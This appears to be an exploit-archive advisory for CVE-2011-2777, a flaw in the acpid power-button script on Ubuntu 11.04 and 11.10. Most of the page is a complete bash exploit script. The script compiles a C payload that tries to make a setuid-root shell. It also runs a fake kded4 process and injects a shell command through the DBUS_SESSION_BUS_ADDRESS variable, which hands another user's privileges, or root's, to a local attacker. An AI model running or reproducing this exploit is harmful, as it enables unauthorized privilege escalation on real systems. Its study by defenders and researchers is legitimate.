Acpid Privilege Boundary Crossing Vulnerability

2011.12.23
Credit: otr
Risk: Medium
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 4.4/10
Impact Subscore: 6.4/10
Exploitability Subscore: 3.4/10
Exploit range: Local
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Exploit Title: Acpid Privilege Boundary Crossing Vulnerability Google Dork: Date: 23-11-2011 Author: otr Software Link: https://launchpad.net/ubuntu/+source/acpid Version: 1:2.0.10-1ubuntu2 Tested on: Ubuntu 11.10, Ubuntu 11.04 CVE : CVE-2011-2777 -- Safeguard this letter, it may be an IMPORTANT DOCUMENT #!/bin/bash # # otr # # The following script is executed when pressing the power button on an Ubuntu # 11.10 system. Depending on how far we get in the condition in the code # fragement, it is possible for another user on the local system to gain the # privileges of the user who has the currently focused display running. The # vulnerability only triggers when certain power management programms are not # running, especially kded4 and the programms in the $PMS variable need not to # be running in order for this to be exploitable. # # This exploit would be more reliable when having a way to dos # gnome-power-manager Also it would be more fun one could trick the getXuser # function into setting $XUSER to root. In the case of root being the user on # the active display this exploit turns into a privilege escalation # # Exploitable file /etc/acpi/powerbtn.sh # In original source code line 40 # # -- # PMS="gnome-power-manager kpowersave xfce4-power-manager" # PMS="$PMS guidance-power-manager.py dalston-power-applet" # # if pidof x $PMS > /dev/null || # ( test "$XUSER" != "" && \ # pidof dcopserver > /dev/null && \ # test -x /usr/bin/dcop && \ # /usr/bin/dcop --user $XUSER kded kded loadedModules \ # | grep -q klaptopdaemon) || # ( test "$XUSER" != "" && \ # test -x /usr/bin/qdbus && \ # test -r /proc/$(pidof kded4)/environ && \ # su - $XUSER -c \ # "eval $(echo -n 'export '; cat /proc/$(pidof kded4)/environ | \ # tr '\0' '\n' | \ # grep DBUS_SESSION_BUS_ADDRESS); \ # qdbus org.kde.kded" | \ # grep -q powerdevil) ;\ # then # -- # # The problem here is that the output of cat /proc/$(pidof kded4)/environ is # controllable by a local user by exporting the DBUS_SESSION_BUS_ADDRESS # variable and running a programm called kded4. # Using this environment variable the attack is able to inject arbitrary shell # commands into the eval expression which will be executed with the rights # of $XUSER which is the user with the currently active display. # # /usr/share/acpi-support/policy-funcs in the PowerDevilRunning function # has similar code but it seems that under normal conditions this only # allows to run code with the privileges one already has. PAYLOADEXE="/var/crash/payload" PAYLOADC="/var/crash/payload.c" KDEDC="kded4.c" KDEDEXE="kded4" TRIGGER="/etc/acpi/powerbtn.sh" rm -f $PAYLOADEXE $KDEDEXE $KDEDC $PAYLOADC echo "[+] Setting umask to 0 so we have world writable files." umask 0 echo "[+] Preparing binary payload." # we _try_ to get a suid root shell, if not we only get a # shell for another user cat > $PAYLOADC <<_EOF #include <sys/stat.h> void main(int argc, char **argv) { if(!strstr(argv[0],"shell")){ printf("[+] Preparing suid shell.\n"); system("cp /var/crash/payload /var/crash/shell"); setuid(0); setgid(0); chown ("/var/crash/shell", 0, 0); chmod("/var/crash/shell", S_IRWXU | S_IRWXG | S_IRWXO | S_ISUID | S_ISGID); }else{ execl("/bin/sh", "/bin/sh", "-i", 0); } } _EOF gcc -w -o $PAYLOADEXE $PAYLOADC echo "[+] Preparing fake kded4 process." cat > $KDEDC <<_EOF #include <unistd.h> void main (){ while(42){ sleep(1); if( access( "/var/crash/shell" , F_OK ) != -1 ) { execl("/var/crash/shell", "/var/crash/shell", "-i", 0); exit(0); } } } _EOF gcc -w -o $KDEDEXE $KDEDC rm -f $KDEDC $PAYLOADC echo "[+] Exporting DBUS_SESSION_BUS_ADDRESS." export DBUS_SESSION_BUS_ADDRESS="xxx & $PAYLOADEXE" echo "[+] Starting kded4." echo "[+] Trying to PMS the system." echo "[+] Waiting for the power button to be pressed." echo "[+] You'll get a shell on this console." ./$KDEDEXE rm $KDEDEXE

References:

https://launchpad.net/ubuntu/+source/acpid


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